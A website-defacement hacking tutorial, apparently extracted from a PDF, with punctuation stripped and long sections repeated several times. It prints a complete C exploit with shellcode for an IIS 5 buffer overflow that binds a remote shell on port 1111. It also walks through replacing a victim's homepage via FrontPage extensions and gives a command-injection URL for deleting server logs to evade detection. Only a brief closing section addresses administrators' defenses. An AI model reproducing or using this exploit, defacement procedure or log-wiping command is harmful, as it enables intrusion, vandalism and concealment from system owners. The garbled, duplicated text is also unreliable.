x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 12
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
